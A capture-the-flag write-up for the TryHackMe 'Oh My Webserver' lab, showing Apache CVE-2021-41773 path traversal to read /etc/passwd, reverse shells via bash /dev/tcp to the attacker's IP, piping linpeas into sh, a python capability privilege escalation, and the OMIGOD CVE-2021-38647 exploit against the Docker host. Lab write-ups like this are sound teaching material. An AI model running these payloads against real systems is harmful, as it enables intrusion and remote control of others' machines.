Oh My Webserver (CVE-2021-41773, Capabilities, Docker, CVE-2021-38647)

First, we need to scan using rustscan.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb  
╰─➤  rustscan -a 10.10.80.91 -- -A | tee rust.log                                                                             130 ↵
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.80.91:22
Open 10.10.80.91:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-03 19:33 +0630
Nmap scan report for 10.10.80.91
Host is up, received syn-ack (0.24s latency).
Scanned at 2022-04-03 19:33:45 +0630 for 17s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.49 ((Unix))
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
|_http-title: Consult - Business Consultancy Agency Template | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.46 seconds

SSH and HTTP ports are open. Let's enumerate HTTP port first. Whatever we click, this webpage only resturn index page. So, we will run gobuster to scan directory of the website.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb  
╰─➤  gobuster -u http://10.10.80.91/ -w /usr/share/wordlists/directory-list-2.3-medium.txt -x .php,.txt.html 

The scanning stage is too long, so we will search exploit using this apache version. Luckily, we found this exploit https://www.exploit-db.com/exploits/50383.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb  
╰─➤  curl -v 'http://10.10.80.91/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
*   Trying 10.10.80.91:80...
* TCP_NODELAY set
* Connected to 10.10.80.91 (10.10.80.91) port 80 (#0)
> POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1
> Host: 10.10.80.91
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Type: text/plain
> Content-Length: 52
> 
* upload completely sent off: 52 out of 52 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 03 Apr 2022 13:16:34 GMT
< Server: Apache/2.4.49 (Unix)
< Transfer-Encoding: chunked
< Content-Type: text/plain
< 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
* Connection #0 to host 10.10.80.91 left intact

Let's reverse shell to my host machine.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb  
╰─➤  curl -v 'http://10.10.80.91/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/10.9.2.121/9001 0>&1' -H "Content-Type: text/plain"

In netcat session, we got reverse shell.

We are in docker container but we have permission to list root directory.

daemon@4a70924bafa0:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@4a70924bafa0:/bin$ cd /root
cd /root
bash: cd: /root: Permission denied

Let's execute linpea to enumerate vulnerable system configuration.

daemon@4a70924bafa0:/bin$ curl http://10.9.2.121/linpeas.sh | sh

And we found vulnerable liux capabilities.

Exploit this vulnerable linux capabilities.

/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh");'

After exploit this capabilites, go to the root directory and read the user flag.

We see our ip is 172.17.0.2. Docker host machine ip will be 172.17.0.1.

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.2  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:02  txqueuelen 0  (Ethernet)
        RX packets 100129  bytes 12304775 (11.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 87214  bytes 25039785 (23.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Use this script to scan the host ip. We used bash one liner script or others. It is not ok. So, we will download static nmap binary from this source https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

curl http://10.9.2.121/nmap -o nmap
./nmap 172.17.0.1 -p- --min-rate 1000 

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-04-03 14:12 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00047s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
5985/tcp closed unknown
5986/tcp open   unknown
MAC Address: 02:42:FD:EB:08:F1 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 132.02 seconds

Port 5985 5986 is WinRM. Let's search exploit for this. This is POC https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/. Here is exploit code https://github.com/AlteredSecurity/CVE-2021-38647

curl http://10.9.2.121/exploit.py -o exploit.py
python3 exploit.py -t 172.17.0.1 -p 5986 -c id

Here is output for this exploit.

Let's get reverse shell.

python3 exploit.py -t 172.17.0.1 -p 5986 -c "bash -c 'bash -i >& /dev/tcp/10.9.2.121/9002 0>&1'"

In netcat session, we got reverse shell.